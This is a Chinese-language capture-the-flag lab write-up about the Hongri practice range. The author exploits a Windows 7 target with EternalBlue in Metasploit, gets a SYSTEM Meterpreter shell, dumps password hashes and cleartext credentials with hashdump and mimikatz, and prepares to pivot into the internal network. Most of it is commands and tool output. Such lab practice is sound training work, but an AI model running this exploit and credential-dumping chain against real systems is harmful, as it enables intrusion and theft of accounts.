【CFS】红日靶场一

红日靶场一有两种Getshell方式
方法一:木马反弹shell
方法二:永恒之蓝
由于方法一过于简单,这里尝试使用msf6及永恒之蓝漏洞
在这之前可以使用nmap扫描一下端口开启情况,我这里直接使用Goby进行一个扫
file
file

加载MS17_010扫描模块开扫

msf6 > use auxiliary/scanner/smb/smb_ms17_010 
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhost 192.168.239.63
rhost => 192.168.239.63
msf6 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 192.168.239.63:445    - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.239.63:445    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

确认存在永恒之蓝漏洞
加载永恒之蓝攻击模块

msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.239.63
rhost => 192.168.239.63
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] 192.168.239.63:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.239.63:445    - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.239.63:445    - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.239.63:445 - The target is vulnerable.
[*] 192.168.239.63:445 - Connecting to target for exploitation.
[+] 192.168.239.63:445 - Connection established for exploitation.
[+] 192.168.239.63:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.239.63:445 - CORE raw buffer dump (42 bytes)
[*] 192.168.239.63:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 192.168.239.63:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 192.168.239.63:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 192.168.239.63:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.239.63:445 - Trying exploit with 17 Groom Allocations.
[*] 192.168.239.63:445 - Sending all but last fragment of exploit packet

[*] 192.168.239.63:445 - Starting non-paged pool grooming
[+] 192.168.239.63:445 - Sending SMBv2 buffers
[+] 192.168.239.63:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.239.63:445 - Sending final SMBv2 buffers.
[*] 192.168.239.63:445 - Sending last fragment of exploit packet!
[*] 192.168.239.63:445 - Receiving response from exploit packet
[+] 192.168.239.63:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.239.63:445 - Sending egg to corrupted connection.
[*] 192.168.239.63:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 192.168.239.63
[*] Meterpreter session 1 opened (192.168.2.15:42585 -> 192.168.239.63:4444 ) at 2022-05-12 04:57:11 -0400
[+] 192.168.239.63:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.239.63:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.239.63:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter > 

多尝试几次获取了权限,由于是内网与靶机隔了一个网段无法反向shell,于是手动关闭了防火墙进行了正向shell的连接
然后进行权限提升

meterpreter > sysinfo
Computer        : STU1
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : zh_CN
Domain          : GOD
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getsystem
[-] Already running as SYSTEM

发现已经是system权限了,我们直接getsystem就好
PS:后期不知道为什么creds_all模块用不了,顺便前面迁移个进程吧,有些32位的meterpreter可能载入模块有点问题
将meterpreter迁移去64位进程

meterpreter > ps

Process List
============

 PID   PPID  Name           Arch  Session  User                   Path
 ---   ----  ----           ----  -------  ----                   ----
····
 612   488   svchost.exe    x64   0        NT AUTHORITY\SYSTEM    C:\Windows\system32\sv                                             ox.exe
····
meterpreter > migrate 612
[*] Migrating from 648 to 612...
[*] Migration completed successfully.
meterpreter > getsystem
[-] Already running as SYSTEM

hashdump输出密码hash,或者载入kiwi模块直接获取所有密码

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
liukaifeng01:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > Interrupt: use the 'exit' command to 
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
[-] Error running command creds_all: ActiveRecord::RecordInvalid Validation failed: Data is not in the NTLMHash data format of <LAN Manager hex digest>:<NT LAN Manager hex digest>, where each hex digest is 32 lowercase hexadecimal characters.
meterpreter > 

2022/5/20 PS:再一次尝试又可以了,可能是Kali内核的问题,我换了个kali版本就跑出来了

meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username       Domain  LM                    NTLM                  SHA1
--------       ------  --                    ----                  ----
Administrator  GOD     edea194d76c77d87923b  8c535a2d84c3b21059d6  eea06a1ec2e153a9441c6
                       4276177762ae          67639bb89db5          6e6fc4f55bce155cba9
STU1$          GOD                           ac41fb70fbcd369d67cf  2ca7a7350a1e590da1e04
                                             0f4b8c899583          af042387378a9d351f0
wdigest credentials
===================
Username       Domain  Password
--------       ------  --------
(null)         (null)  (null)
Administrator  GOD     hongrisec@2022
STU1$          GOD     ...
tspkg credentials
=================
Username       Domain  Password
--------       ------  --------
Administrator  GOD     hongrisec@2022
kerberos credentials
====================
Username       Domain   Password
--------       ------   --------
(null)         (null)   (null)
Administrator  GOD.ORG  hongrisec@2022
stu1$          GOD.ORG  ...

还是不知道报什么错,于是上网找了另一种方法,kiwi_cmd可以调用mimikatz模块的所有功能

meterpreter > kiwi_cmd sekurlsa::logonpasswords
····
    msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : GOD
         * LM       : edea194d76c77d87840ac10a764c7362
         * NTLM     : 8a963371a63944419ec1adf687bb1be5
         * SHA1     : 343f44056ed02360aead5618dd42e4614b5f70cf
        tspkg :
         * Username : Administrator
         * Domain   : GOD
         * Password : hongrisec@2019
        wdigest :
         * Username : Administrator
         * Domain   : GOD
         * Password : hongrisec@2019
        kerberos :
         * Username : Administrator
         * Domain   : GOD.ORG
         * Password : hongrisec@2019
        ssp :
        credman :
····

2022/5/29 书接上回:
已经有不少东西发生了改变了,所以接下来的密码之类的可能和上面展示的有所不同
由于是Windows 7主机,可以尝试开启下3389的Rdp端口

meterpreter > run post/windows/manage/enable_rdp
[*] Enabling Remote Desktop
[*]     RDP is already enabled
[*] Setting Terminal Services service startup mode
[*]     Terminal Services service is already set to auto
[*]     Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file: /home/kali/.msf4/loot/20220529040006_default_192.168.239.53_host.windows.cle_201935.txt

这里已经被我小伙伴先行一步打开了
尝试下远程登陆

rdesktop -g 1440x900 -r disk:LinuxxDisk=/root/Downloads -u STU1 -p "hongrisec@2022" 192.168.239.53
rdesktop -g 1440x900 -r disk:LinuxxDisk=/root/Downloads -u Administrator -p "hongrisec@2022" 192.168.239.53

好像Rdp都登录不进去,可能是限制了域,那就找别的办法,可以直接添加路由,挂Socks代理
ipconfig /all查看所有内网网段

meterpreter > ipconfig /all
···
Interface 11
============
Name         : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:c2:e7:1b
MTU          : 1500
IPv4 Address : 192.168.52.143
IPv4 Netmask : 255.255.255.0
···
Interface 25
============
Name         : Intel(R) PRO/1000 MT Network Connection #2
Hardware MAC : 00:0c:29:c2:e7:25
MTU          : 1500
IPv4 Address : 192.168.239.53
IPv4 Netmask : 255.255.255.0
···

发现其内网还有一个网段,那么直接考虑将其代理出来

发布者

正汰

永远是这样,山前面是山,天空上面是天空,道路前面还是道路,迷茫之后还有迷茫。

发表评论

您的电子邮箱地址不会被公开。